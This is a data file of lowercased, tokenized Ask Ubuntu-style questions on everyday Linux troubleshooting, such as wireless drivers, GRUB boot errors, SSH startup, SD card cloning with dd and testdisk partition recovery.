227844	how can i install ubuntu 's 10.10 kernel i ubuntu 12.10 ?	i did use ubuntu 10.10 for a long time , and now i replaced it with ubuntu 12.10 , every thing works great , but i do have one little problem , which is with my wireless card . on ubuntu 10.10 , it worked perfectly , and it even worked better than in windows 7 , so i was very happy with ubuntu 10.10 , but , like i said , after installing 12.10 , my wireless card does n't work any more , so i heard that kernels are the reason for that . are kernels the reason for my wireless not working now ? if yes then please teach me how to remove my current kernels and install 10.10 kernels . i went to -additional drivers- and i found something very weird i took picture and this is what it look like '' apply changes '' button not active so i ca n't install driver : ( anyway ... my wireless card is wl-138g v2 ( remember on ubuntu 10.10 it was working 100 % normally and free i did not pay for it driver ) so ... now what shall i do ? it is saying in picture // using non-free firmware for linux kernel drivers from linux-firmware-nonfree ( proprietary ) // btw i did `` rfkill list '' but no-thing appear under that command .
227853	why i get grub error after upgrading ubuntu 12.04 to 12.10 ?	i upgraded my ubuntu 12.04 to 12.10 with the help of update manager . everything was going well during upgrading but in the end when the system restarted the following error occured : error : file not found . grub rescue > what i need to do to fix that error ? will my personal data be safe ? please reply me .
227856	ssh does not start on boot	i just dd the ubuntu 12.10 windows installer , did the updates , and upgraded . sudo apt-get update sudo apt-get -y upgrade sudo apt-get -y dist-upgrade from there i installed openssh apt-get install openssh-server . i was able to login using a remote machine . i changed grub to start in command line interface ( cli ) . in /etc/default/grub i changed grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' single '' . i 've rebooted and then was not able to connect anymore . so i went back over to the server and checked the ssh status service ssh status and it says it 's `` stopped/waiting '' . if i start it then everything is fine until i reboot . obviously , that 's not the optimal solution . all the /var/log/auth.log says is : dec 11 04:20:22 ubuntu sudo : pam_unix ( sudo : session ) : session closed for user root dec 11 04:21:37 ubuntu sshd [ 433 ] : received signal 15 : terminating . i have tried many different things that i read doing google searches but nothing seems to fix it . my /etc/ssh/ssh_config file is default . i have n't changed anything in it . also , i just switched grub back to default so it loads the gui and i logged into my account and now i am able to log into ssh with my remote computer .
227857	only wallpaper , no icons or menus after update	while away from the uk in zambia my wife ran the update through package manager and now we have no icons . we have the wallpaper but can not do anything !
227861	someone erased the mac os x with ubuntu , how do i get it back ?	so for a further detail about this , my friend has a macbook pro thats all i know about it specfically aside from the fact it was running os x lion . before this guy got a hold of the computer that he knows , i could hit the command key and the r key to get to the disk utilities and what-not to install os x lion on it , but now since whomever my friend let touch th mac , i no longer and do any of the start-up keys for it.. i 've been trying to geth the mac os x lion on there and im having no luck what-so-ever , if anyone could help me with this i would be greatly appreciative ... if you need anymore info that i may be able to provide please feel free to ask . thank you again .
227870	lm-sensor and cpu temperatures	i am on ubuntu precise pangolin . the processor is intel i3 . a desktop . i installed lm-sensors and below is the report sensors gave coretemp-isa-0000 adapter : isa adapter core 0 : +30.0°c ( high = +89.0°c , crit = +105.0°c ) core 2 : +33.0°c ( high = +89.0°c , crit = +105.0°c ) w83627dhg-isa-0a10 adapter : isa adapter vcore : +0.93 v ( min = +0.00 v , max = +1.74 v ) in1 : +0.75 v ( min = +1.99 v , max = +1.99 v ) alarm avcc : +3.36 v ( min = +2.98 v , max = +3.63 v ) +3.3v : +3.36 v ( min = +2.98 v , max = +3.63 v ) in4 : +1.30 v ( min = +0.90 v , max = +1.77 v ) in5 : +0.76 v ( min = +1.15 v , max = +0.90 v ) alarm in6 : +1.06 v ( min = +0.94 v , max = +2.03 v ) 3vsb : +3.36 v ( min = +2.98 v , max = +3.63 v ) vbat : +3.36 v ( min = +2.70 v , max = +3.30 v ) alarm fan1 : 0 rpm ( min = 3515 rpm , div = 128 ) alarm fan2 : 0 rpm ( min = 10546 rpm , div = 128 ) alarm fan3 : 0 rpm ( min = 10546 rpm , div = 128 ) alarm fan5 : 0 rpm ( min = 10546 rpm , div = 128 ) alarm temp1 : +39.0°c ( high = -121.0°c , hyst = +9.0°c ) alarm sensor = diode temp2 : +39.0°c ( high = +80.0°c , hyst = +75.0°c ) sensor = diode temp3 : +127.0°c ( high = +80.0°c , hyst = +75.0°c ) alarm sensor = thermistor cpu0_vid : +2.050 v intrusion0 : ok radeon-pci-0100 adapter : pci adapter temp1 : +70.5°c the fans sensors are detecting 0 rpm and some temperatures are out of range - the alarms above but i dont understand it very well . can someone help out ?
227872	how to use pam_blue with lightdm , and unity-greeter ?	i want lightdm to skip asking for my password if my phone is nearby . how is that possible with lightdm , and unity-greeter ? also i 'm interested in knowing whether its secure , because it does n't seem being that .
227879	grub not detecting windows 8	i have a dell inspiron 5520 . i had installed windows 8 and have ubuntu 12.04 installed in a different partition . i installed grub but it was not showing windows 8 . so i added menuentry `` windows 8 '' { set root = `` ( hd0,4 ) '' chainloader +1 } in /etc/grub.d/40_custom . now , i see windows 8 option but it says error-invalid selection when i select it . please help . this is the output of fdisk -l : /dev/sda1 * 16072 626807 305368 de dell utility /dev/sda3 7645184 500201471 246278144 7 hpfs/ntfs/exfat /dev/sda4 500203518 976771071 238283777 f w95 ext 'd ( lba ) partition 4 does not start on physical sector boundary . /dev/sda5 500203520 870275071 185035776 7 hpfs/ntfs/exfat /dev/sda6 870277120 886276095 7999488 82 linux swap / solaris /dev/sda7 886278144 976771071 45246464 83 linux
227881	lsusb - where device description comes from	for one of my attached usb devices ( 2773:0104 ) i see no description in lsusb command output : user @ thinkpad-laptop : ~/binaries $ lsusb bus 008 device 002 : id 0a5c:217f broadcom corp . bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 036 : id 2773:0104 where usb description is comming from , is it from device driver or is it stored in the hardware itself ?
227883	how can i adjust system volume from within xbmc ?	while running xbmc , i can adjust the volume of the xbmc application itself . however , this volume is limited by the current system volume . for example , if the system volume is at 80 % and xbmc is at 100 % , i am effectively at 80 % and can not go higher . or if the sound is too soft and needs a boost , i would normally increase the system volume beyond 100 % . xbmc takes over the whole screen , so the system volume is not accessible . pressing the super key brings up the dash and top menu , but clicking on it is difficult and inconsistent , and very quickly xbmc takes over the screen again . how can i adjust the system volume without having to quit xbmc ?
227886	unable to see gui	hey i have installed ubuntu 12.04 on vmware work station on windows 7 but when i start it up in vmware i get a message on black screen of ubuntu i.e . [ 7.3326 ] pixx4_smbus 0000:00:07.3 : host smbus controller not enabled ! after that it asks for user id and password on black screen and after entering them i am still in a black screen , i am unable to see gui . please suggest what to do . i am new to ubuntu .
227890	kill java processes	i 'm working on a computationally heavy code that - for now - crashes a lot , but i 'm still working on it : ) when it crashes , i ca n't close the gui window ; i have to open a shell and kill -9 the process . it is a java process and it is easy to find : nkint @ zefiro : ~ $ ps aux | grep java nkint 2705 16.6 1.0 460928 43680 ? sl 12:23 0:08 /usr/lib/jvm/java-6-sun-1.6.0.26/bin/java -djava.library.path=something something nkint 2809 0.0 0.0 4012 776 pts/0 s+ 12:24 0:00 grep -- color=auto java nkint @ zefiro : ~ $ kill -9 2705 now it is easy but quite a mechanical task . so normally i wait for about 7-8 processes to crash , and then kill -9 each of them . i want to do this in an automatic way . i think that it should be easy to pipe some commands to take the id of the ( n-1 ) results of ps aux | grep java and kill it but i do n't have any idea where to start . can anyone give me any hints ?
227897	what are the different unity web-apps that are available ?	now that ubuntu is officially supporting web-apps i just wanted to know what are the different web-apps that are available out there . i know the most basic ones just add an icon in the launcher when the site is opened . i am more interested in useful ones like the gmail-webapp , which manipulates the messaging indicator menu . i hope this question serves as a one-stop point similar to the likes of what lenses for unity are available ? what application indicators are available ?
227901	how do i use my laptop 's media keys with decibel-audio-player ?	this is not a question about setting up media keys , as mine have all been recognised and have their correct keysyms assigned , and i can use rhythmbox with them and other applications . i was thinking that there must be a way to use the special xf86audio keys ( such as play , stop , next , and previous track buttons ) with decibel , as most media player applications 'grab ' the keys when you start the application . some need setting up manually , but there does n't seem to be any guides for decibel-audio-player . is it possible to use the appropriate laptop media keys with this player ?
227903	removing duplicate entries in boot menu ( wubi )	i tried a wubi install , but it got stuck , so i restarted the system , uninstalled it from windows and did the whole process again . now , in the menu that shows windows 7 and ubuntu as options , there are 2 ubuntu options . how do i trim it ?
227905	ca n't resize lvm-p2 boot partition , even from live cd	i 've got a macbook pro ( late 2011 ) . i just bought a 1tb hdd to replace the original 500gb . my plan was to partition the 1tb in half and let one side be ubuntu and the other os x ( until i can reasonable get rid of os x. i need it for work ) . right now i have ubuntu 12.10 installed on the 1tb and it 's fine , but it 's taking up all of the drive . it automatically set the partition that way . i made sure to check the lvm box . easy to resize , they said . right . here 's what i 've got right now , as seen from booting up on a live cd or usb : the partition is locked . it 's not mounted though . yet for the life of me i ca n't figure out how to resize it . it makes me wonder why i bothered with the lvm in the first place instead of just installing on fat32 . in fact the real reason it 's this way is that i just let it do the auto install , and was never given an option for other partition setups . i did this because i wanted to make sure the efi partition was set up right . i 've had problems with that on past computers . i have a few questions , but only a few need to be answered to solve this for me . i 'm less concerned with the intellectual pursuit at this point than i am in just getting it working . why ca n't i resize this ? why is it locked ? more importantly , how do i fix this ? google returns answers that do n't work for one reason or another . should i go back and reinstall but do it all manually and set it up as 2 partitions ? if so , do i need to create a efi and swap partition in the process , or is efi taken care of automatically ? i 'm coming back to linux after years away , so i 'm quite rusty . any help will be greatly appreciated . edit : the following is from the terminal ubuntu @ ubuntu : ~ $ sudo e2fsck -f /dev/sda3 e2fsck 1.42.5 ( 29-jul-2012 ) /dev/sda3 is in use . e2fsck : can not continue , aborting . ubuntu @ ubuntu : ~ $ umount /dev/sda3 umount : /dev/sda3 is not mounted ( according to mtab ) so it 's in use but yet it 's not mounted ?
227906	grub error , can not boot win 7 after trying to install win 8	i tried installing win 8 and had to cancel the setup at a point . and now when i start my pc an error comes up like : find -- set_root- -- ignore floppies- ... /bootmgr error 15 : file not found press any key to continue ... and when i press a key it goes to the red grub4dos menu , and there are a lot of options there , but i have no idea what to do . i have win 7 installed but do n't know how to boot it . i am totally new to grub . please help me solve this . thank you .
227910	how to download ubuntu 12.04 lts on windows xp for writting on a cd ?	since i ca n't start my internet on ubuntu 8.04 lts on laptop , i first want to download it on a cd on windows xp . how can i download it on a cd and than re-install on laptop ? i will format my laptop which has ubuntu 8.04 lts . which poses lot of problems . parag shah
227911	on 12.04 & xp dual boot system , howto upgrade xp to win 7 ?	i have system with xp installed first , followed by mint 12 and then ubuntu 12.04 . i now wish to remove win xp and install win 7 in the win xp partition . how do i go about this ? thanks for any help in the matter .
227919	phpstorm problem in ubuntu 12.04	i have a problem starting phpstorm 5 on ubuntu 12.04 , it shows the following errors stack : i installed ubuntu just now , so its a fresh copy , changed only ubuntu 2d when logged in , installed java from oracle , so its available for sure . can somebody help , will really appreciate . thanks in advance . vadim @ vadim-ms-7309 : ~ $ '/home/vadim/phpstorm-121.390/bin/phpstorm.sh' java.lang.reflect.invocationtargetexception at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:601 ) at com.intellij.ide.plugins.pluginmanager $ 2.run ( pluginmanager.java:182 ) at java.lang.thread.run ( thread.java:722 ) caused by : java.lang.unsatisfiedlinkerror : /home/vadim/jdk1.7.0_09/jre/lib/i386/xawt/libmawt.so : libxtst.so.6 : can not open shared object file : no such file or directory at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1825 ) at java.lang.runtime.load0 ( runtime.java:792 ) at java.lang.system.load ( system.java:1059 ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1846 ) at java.lang.runtime.loadlibrary0 ( runtime.java:845 ) at java.lang.system.loadlibrary ( system.java:1084 ) at sun.security.action.loadlibraryaction.run ( loadlibraryaction.java:67 ) at sun.security.action.loadlibraryaction.run ( loadlibraryaction.java:47 ) at java.security.accesscontroller.doprivileged ( native method ) at java.awt.toolkit.loadlibraries ( toolkit.java:1648 ) at java.awt.toolkit. < clinit > ( toolkit.java:1670 ) at com.intellij.ui.appuiutil.updateframeclass ( appuiutil.java:81 ) at com.intellij.idea.mainimpl.start ( mainimpl.java:46 ) ... 6 more error : error while accessing com.intellij.idea.mainimpl.start with arguments : [ ] java.lang.reflect.invocationtargetexception at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:601 ) at com.intellij.ide.plugins.pluginmanager $ 2.run ( pluginmanager.java:182 ) at java.lang.thread.run ( thread.java:722 ) caused by : java.lang.unsatisfiedlinkerror : /home/vadim/jdk1.7.0_09/jre/lib/i386/xawt/libmawt.so : libxtst.so.6 : can not open shared object file : no such file or directory at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1825 ) at java.lang.runtime.load0 ( runtime.java:792 ) at java.lang.system.load ( system.java:1059 ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1846 ) at java.lang.runtime.loadlibrary0 ( runtime.java:845 ) at java.lang.system.loadlibrary ( system.java:1084 ) at sun.security.action.loadlibraryaction.run ( loadlibraryaction.java:67 ) at sun.security.action.loadlibraryaction.run ( loadlibraryaction.java:47 ) at java.security.accesscontroller.doprivileged ( native method ) at java.awt.toolkit.loadlibraries ( toolkit.java:1648 ) at java.awt.toolkit. < clinit > ( toolkit.java:1670 ) at com.intellij.ui.appuiutil.updateframeclass ( appuiutil.java:81 ) at com.intellij.idea.mainimpl.start ( mainimpl.java:46 ) ... 6 more error : error while accessing com.intellij.idea.mainimpl.start with arguments : [ ] java.lang.assertionerror : error while accessing com.intellij.idea.mainimpl.start with arguments : [ ] at com.intellij.openapi.diagnostic.defaultlogger.error ( defaultlogger.java:50 ) at com.intellij.openapi.diagnostic.logger.error ( logger.java:65 ) at com.intellij.ide.plugins.pluginmanager $ 2.run ( pluginmanager.java:186 ) at java.lang.thread.run ( thread.java:722 ) exception : java.lang.assertionerror thrown from the uncaughtexceptionhandler in thread `` idea main thread '' edit : the problem is that os should be the same as phpstorm , i had 64 os and 32 phpstorm . problem solved thanks .
227924	sd card clone using dd command	i am trying to clone sd card which may contain number of partitions , some of them ubuntu can not recognize . generally , i want to clone the whole volume , not only some partition . so , i mount sd card and see in the log viewer something like this : kernel : [ 262.025221 ] sdc : sdc1 sdc2 alex @ u120432 : ~ $ ls /dev/sdc* /dev/sdc /dev/sdc1 /dev/sdc2 since i want to copy the whole disk , i execute : dd if=/dev/sdc of=sdimage.img bs=4m file sdimage.img , 7.9 gb ( 7,944,011,776 bytes ) is created ( sd card is 8 gb ) . now i mount another sd card and execute : dd if=sdimage.img of=/dev/sdc bs=4m the problem is that the second dd command hangs on some stage , and never succeeds . after this , i can not reboot or shut down computer , and need just to switch power off . is this correct approach ? maybe there is another way to clone sd card ? os ubuntu 12.04 , 32 bit .
227926	how to install the rpm package jdk-7u9-linux-i586.rpm ?	i download the jdk-7u9-linux-i586.rpm ( not the rpm.bin ) i use code rpm -ivh jdk-7u9-linux-i586.rpm . but it can not install it succesfully , why ? ? i use google to search the anwser , but they all about how to install a `` bin '' file , not the `` rpm '' i download at the java.com its file is the `` rpm '' , not the `` xxx.rpm.bin '' now i have no idea about this .
227931	login password problem	i am using kubuntu 12.10 . my problem is when my kubuntu starts , in login screen it shows my name & a field for giving password ( previously what i have choose for my account ) . but if at this stage , i hit enter or write anything & hit enter it gets log in ! ! ! so strange ! ( a huge security problem for me ! ) but in `` sudo '' it not working on any password , i have to give my selected password to access sudo ! how can my login problem be solved ? !
227937	ca n't get native resolution	i am running ubuntu 12.10 on hp pavilion slimline with nvidia gt220 video card and nvidia driver 310.14 . i have samsung lcd connected through hdmi , native resolution of this tv is 1366x768 , but the only options i am getting in settings are 1920x1080 , 1280x720 , 720x480 and 640x480 . i 'd like to run in native resolution , so how can add it to the list of available options ? i tried to use xrandr , but not sure what are correct values to enter or whether it 's the right way to go . edit after running cvt 1366 768 60 i got the following : # 1368x768 59.88 hz ( cvt ) hsync : 47.79 khz ; pclk : 85.25 mhz modeline `` 1368x768_60.00 '' 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync then running xrandr i have screen 0 : minimum 8 x 8 , current 1280 x 720 , maximum 8192 x 8192 dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 connected 1280x720+0+0 ( normal left inverted right x axis y axis ) 160mm x 90mm 1280x720 60.0*+ 59.9 1920x1080 30.0 30.0 720x480 59.9 640x480 59.9 1368x768_60.00 ( 0x2aa ) 85.2mhz h : width 1368 start 1440 end 1576 total 1784 skew 0 clock 47.8khz v : height 768 start 771 end 781 total 798 clock 59.9hz however , when running xrandr -- addmode hdmi-0 1368x768_60.00 , i get : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 29 current serial number in output stream : 30
227940	uwsgi ca n't find python plugin	i 'm trying to deploy a python app to my ubuntu 12.04.1 vps running nginx / uwsgi . i 've setup my server following this guide . when i restart uwsgi i get this message : nickd @ my-vps : ~ $ sudo /etc/init.d/uwsgi restart [ sudo ] password for nickd : * restarting app server ( s ) uwsgi [ uwsgi ] getting ini configuration from /usr/share/uwsgi/conf/default.ini [ uwsgi ] parsing config file /etc/uwsgi/apps-enabled/application.net.xml open ( `` ./python_plugin.so '' ) : no such file or directory [ core/utils.c line 4700 ] ! ! ! unable to load uwsgi plugin : ./python_plugin.so : can not open shared object file : no such file or directory ! ! ! tue dec 11 15:18:06 2012 - [ warning ] option `` app '' is deprecated : use the more advanced `` mount '' option my application.net.xml : < uwsgi > < plugin > python < /plugin > < socket > /run/uwsgi/app/application.net/application.net.socket < /socket > < pythonpath > /var/www/apps/application/ < /pythonpath > < app mountpoint= '' / '' > < script > wsgi_configuration_module < /script > < /app > < master/ > < processes > 4 < /processes > < harakiri > 60 < /harakiri > < reload-mercy > 8 < /reload-mercy > < cpu-affinity > 1 < /cpu-affinity > < stats > /tmp/stats.socket < /stats > < max-requests > 2000 < /max-requests > < limit-as > 512 < /limit-as > < reload-on-as > 256 < /reload-on-as > < reload-on-rss > 192 < /reload-on-rss > < no-orphans/ > < vacuum/ > < /uwsgi > my ini config is default . any help getting uwsgi to load the python plugin would be appreciated .
227948	how can i successfully install ubuntu 12.10 next to windows 7	i have an installation of windows 7 and i would like to install ubuntu 12.10 side by side . during the installation of ubuntu grub comes up with an error and gives me the option to select which disk it should be installed to . i have always found this difficult as i am never sure which disk to select . in my case i see one with `` windows bootloader '' . i was guessing that was the boot disk for my system but having selected it and completing the ubuntu installation , grub did not appear and windows loaded . i had no way to get to my ubuntu installation . i then tried another disk for grub after receiving the same message on a re-install of ubuntu but it did n't work either . in stead of fumbling about i thought i would ask here . thanks for any advice !
227950	how to remove the ubuntu software center suggestions from the dash	i want to remove the ubuntu software center suggestions from the dash in ubuntu 12.10 . how to do that ?
227952	ubuntu tv on a pc	where can i download ubuntu tv for pc ? i have an amd sempron computer and 1 gb of ram memory . i want to know if i can install ubuntu tv on that pc . i will thank you to answar me
227956	steam fatal error `` steam needs to be online to update , but was set to offline movies .	i tried re-installing it but it simply kept giving me this error in a little window it also gives me an identical error some 3 seconds later without any new provocation .
227958	need help with testdisk output	i had ( note the past tense ) an ubuntu 12.04 system with separate partitions for the base and /home directories . it started acting wonky , so i decided to do a reinstall with 12.10 , intending just to do a reinstall to the base partition . after several seconds , i realize that the installer was repartitioning the drive and reinstalling , so i pulled the power cord . i 'm now trying to recover as much as i can with testdisk , but it seems that testdisk is finding > 100 unique partitions when i run it - they mostly tend to be hfs+ or solaris /home ( which i think is just an ext4 ; i 've never had solaris on the machine ) . i 've pasted an abbreviated version of the testdisk output below ( first ~100 lines , and then ~100 lines from the middle of the output ) . is there a way to combine or recreate the partitions and then data recovery , or some other way maximize what i can recover ( ideally as much of the file system as possible ) ? i really only care about what was in the /home directory - i 'd rather not use photorec since i do n't have another 2 tb hd lying around to recover to . thanks , dan mon dec 10 06:03:00 2012 command line : testdisk testdisk 6.13 , data recovery utility , november 2011 christophe grenier < grenier @ cgsecurity.org > http : //www.cgsecurity.org os : linux , kernel 3.2.34-std312-amd64 ( # 2 smp sat nov 17 08:06:32 utc 2012 ) x86_64 compiler : gcc 4.4 compilation date : 2012-11-27t22:44:52 ext2fs lib : 1.42.6 , ntfs lib : libntfs-3g , reiserfs lib : 0.3.1-rc8 , ewf lib : none /dev/sda : lba , hpa , lba48 , dco support /dev/sda : size 3907029168 sectors /dev/sda : user_max 3907029168 sectors /dev/sda : native_max 3907029168 sectors warning : ca n't get size for disk /dev/mapper/control - 0 b - chs 1 1 1 , sector size=512 /dev/sr0 is not an ata disk hard disk list disk /dev/sda - 2000 gb / 1863 gib - chs 243201 255 63 , sector size=512 - wdc wd20ears-00j2gb0 , s/n : wd-wcayy0075071 , fw:80.00a80 disk /dev/sdb - 1013 mb / 967 mib - chs 1014 32 61 , sector size=512 - generic flash disk , fw:8.07 disk /dev/sr0 - 367 mb / 350 mib - chs 179470 1 1 ( ro ) , sector size=2048 - plds dvd+/-rw dh-16aas , fw : jd12 partition table type ( auto ) : intel disk /dev/sda - 2000 gb / 1863 gib - wdc wd20ears-00j2gb0 partition table type : efi gpt analyse disk /dev/sda - 2000 gb / 1863 gib - chs 243201 255 63 current partition structure : bad gpt partition , invalid signature . search_part ( ) disk /dev/sda - 2000 gb / 1863 gib - chs 243201 255 63 recover_ext2 : s_block_group_nr=0/14880 , s_mnt_count=5/4294967295 , s_blocks_per_group=32768 , s_inodes_per_group=8192 recover_ext2 : s_blocksize=4096 recover_ext2 : s_blocks_count 487593984 recover_ext2 : part_size 3900751872 ms data 2048 3900753919 3900751872 ext4 large file sparse superblock , 1997 gb / 1860 gib linux swap 3900755968 3907028975 6273008 swap2 version 1 , 3211 mb / 3062 mib results p ms data 2048 3900753919 3900751872 ext4 large file sparse superblock , 1997 gb / 1860 gib p linux swap 3900755968 3907028975 6273008 swap2 version 1 , 3211 mb / 3062 mib interface_write ( ) 1 p ms data 2048 3900753919 3900751872 2 p linux swap 3900755968 3907028975 6273008 search_part ( ) disk /dev/sda - 2000 gb / 1863 gib - chs 243201 255 63 recover_ext2 : s_block_group_nr=0/14880 , s_mnt_count=5/4294967295 , s_blocks_per_group=32768 , s_inodes_per_group=8192 recover_ext2 : s_blocksize=4096 recover_ext2 : s_blocks_count 487593984 recover_ext2 : part_size 3900751872 ms data 2048 3900753919 3900751872 ext4 large file sparse superblock , 1997 gb / 1860 gib block_group_nr 1 recover_ext2 : `` e2fsck -b 32768 -b 4096 device '' may be needed recover_ext2 : s_block_group_nr=1/14880 , s_mnt_count=0/4294967295 , s_blocks_per_group=32768 , s_inodes_per_group=8192 recover_ext2 : s_blocksize=4096 recover_ext2 : s_blocks_count 487593984 recover_ext2 : part_size 3900751872 ms data 2046 3900753917 3900751872 ext4 large file sparse superblock backup superblock , 1997 gb / 1860 gib block_group_nr 1 recover_ext2 : `` e2fsck -b 32768 -b 4096 device '' may be needed recover_ext2 : s_block_group_nr=1/14880 , s_mnt_count=0/4294967295 , s_blocks_per_group=32768 , s_inodes_per_group=8192 recover_ext2 : s_blocksize=4096 recover_ext2 : s_blocks_count 487593984 recover_ext2 : part_size 3900751872 ms data 2048 3900753919 3900751872 ext4 large file sparse superblock backup superblock , 1997 gb / 1860 gib block_group_nr 1 recover_ext2 : `` e2fsck -b 32768 -b 4096 device '' may be needed recover_ext2 : s_block_group_nr=1/14584 , s_mnt_count=0/27 , s_blocks_per_group=32768 , s_inodes_per_group=8192 recover_ext2 : s_blocksize=4096 recover_ext2 : s_blocks_count 477915164 recover_ext2 : part_size 3823321312 ms data 4094 3823325405 3823321312 ext4 large file sparse superblock backup superblock , 1957 gb / 1823 gib block_group_nr 1 ... .snip ... ... ms data 2046 3900753917 3900751872 ext4 large file sparse superblock backup superblock , 1997 gb / 1860 gib ms data 2048 3900753919 3900751872 ext4 large file sparse superblock , 1997 gb / 1860 gib ms data 4094 3823325405 3823321312 ext4 large file sparse superblock backup superblock , 1957 gb / 1823 gib ms data 4096 3823325407 3823321312 ext4 large file sparse superblock backup superblock , 1957 gb / 1823 gib ms data 7028840 7033383 4544 fat12 , 2326 kb / 2272 kib mac hfs 67856948 67862179 5232 hfs+ found using backup sector ! , 2678 kb / 2616 kib mac hfs 67862176 67867407 5232 hfs+ , 2678 kb / 2616 kib mac hfs 67862244 67867475 5232 hfs+ found using backup sector ! , 2678 kb / 2616 kib mac hfs 67867404 67872635 5232 hfs+ , 2678 kb / 2616 kib mac hfs 67867472 67872703 5232 hfs+ , 2678 kb / 2616 kib mac hfs 67872700 67877931 5232 hfs+ , 2678 kb / 2616 kib mac hfs 67937834 67948067 10234 [ easyinstall_osx ] hfs found using backup sector ! , 5239 kb / 5117 kib mac hfs 67938012 67948155 10144 hfs+ found using backup sector ! , 5193 kb / 5072 kib mac hfs 67948064 67958297 10234 [ easyinstall_osx ] hfs , 5239 kb / 5117 kib mac hfs 67948070 67958303 10234 [ easyinstall_osx ] hfs found using backup sector ! , 5239 kb / 5117 kib mac hfs 67948152 67958295 10144 hfs+ , 5193 kb / 5072 kib mac hfs 67958292 67968435 10144 hfs+ , 5193 kb / 5072 kib mac hfs 67958300 67968533 10234 [ easyinstall_osx ] hfs , 5239 kb / 5117 kib mac hfs 67992596 67997827 5232 hfs+ found using backup sector ! , 2678 kb / 2616 kib mac hfs 67997824 68003055 5232 hfs+ , 2678 kb / 2616 kib mac hfs 67997892 68003123 5232 hfs+ found using backup sector ! , 2678 kb / 2616 kib mac hfs 68003052 68008283 5232 hfs+ , 2678 kb / 2616 kib mac hfs 68003120 68008351 5232 hfs+ , 2678 kb / 2616 kib mac hfs 68008348 68013579 5232 hfs+ , 2678 kb / 2616 kib solaris /home 84429840 123499141 39069302 ufs1 , 20 gb / 18 gib solaris /home 84429952 123499253 39069302 ufs1 , 20 gb / 18 gib solaris /home 84493136 123562437 39069302 ufs1 , 20 gb / 18 gib solaris /home 84493248 123562549 39069302 ufs1 , 20 gb / 18 gib solaris /home 84566088 123635389 39069302 ufs1 , 20 gb / 18 gib solaris /home 84566200 123635501 39069302 ufs1 , 20 gb / 18 gib solaris /home 84571232 123640533 39069302 ufs1 , 20 gb / 18 gib solaris /home 84571344 123640645 39069302 ufs1 , 20 gb / 18 gib solaris /home 84659952 123729253 39069302 ufs1 , 20 gb / 18 gib solaris /home 84660064 123729365 39069302 ufs1 , 20 gb / 18 gib solaris /home 84690504 123759805 39069302 ufs1 , 20 gb / 18 gib solaris /home 84690616 123759917 39069302 ufs1 , 20 gb / 18 gib solaris /home 84700424 123769725 39069302 ufs1 , 20 gb / 18 gib solaris /home 84700536 123769837 39069302 ufs1 , 20 gb / 18 gib solaris /home 84797720 123867021 39069302 ufs1 , 20 gb / 18 gib solaris /home 84797832 123867133 39069302 ufs1 , 20 gb / 18 gib solaris /home 84812544 123881845 39069302 ufs1 , 20 gb / 18 gib solaris /home 84812656 123881957 39069302 ufs1 , 20 gb / 18 gib solaris /home 84824552 123893853 39069302 ufs1 , 20 gb / 18 gib solaris /home 84824664 123893965 39069302 ufs1 , 20 gb / 18 gib solaris /home 84847528 123916829 39069302 ufs1 , 20 gb / 18 gib solaris /home 84847640 123916941 39069302 ufs1 , 20 gb / 18 gib solaris /home 84886840 123956141 39069302 ufs1 , 20 gb / 18 gib solaris /home 84886952 123956253 39069302 ufs1 , 20 gb / 18 gib solaris /home 84945488 124014789 39069302 ufs1 , 20 gb / 18 gib solaris /home 84945600 124014901 39069302 ufs1 , 20 gb / 18 gib solaris /home 84957992 124027293 39069302 ufs1 , 20 gb / 18 gib solaris /home 84958104 124027405 39069302 ufs1 , 20 gb / 18 gib solaris /home 84962240 124031541 39069302 ufs1 , 20 gb / 18 gib solaris /home 84962352 124031653 39069302 ufs1 , 20 gb / 18 gib solaris /home 84977168 124046469 39069302 ufs1 , 20 gb / 18 gib solaris /home 84977280 124046581 39069302 ufs1 , 20 gb / 18 gib ms data 174395467 178483851 4088385 ... .. snip ( it keeps going on for quite a while )
227959	custom boot logo only works on shutdown	for some reason my custom boot logo is only working on shutdown . when booting up , it just displays the standard purple ubuntu screen with the orange dots . any ideas why this might be happening ? thanks .
227961	fbset does nothing	i ca n't change tty resolution/mode by running fbset . no matter what mode or geometry i use ( correct syntax , i even referred to /etc/fb.modes ) , it simply shows no output and it does n't change resolution . how do i change the resolution without rebooting ? also , what generates /etc/fb.modes . i want to run again whatever that is .
227965	copying data from centos hard drive to ubuntu	i have a 2 pcs wiht ubuntu 10.04 and centos 5.8 installed.i want to copy all the data from centos hard drive to one with ubuntu . how can i do this ? ? ? i have tried directly plugging centos hard drive with ubuntu running pc . but centos hard drive is not visible in ubuntu . please suggest a solution .
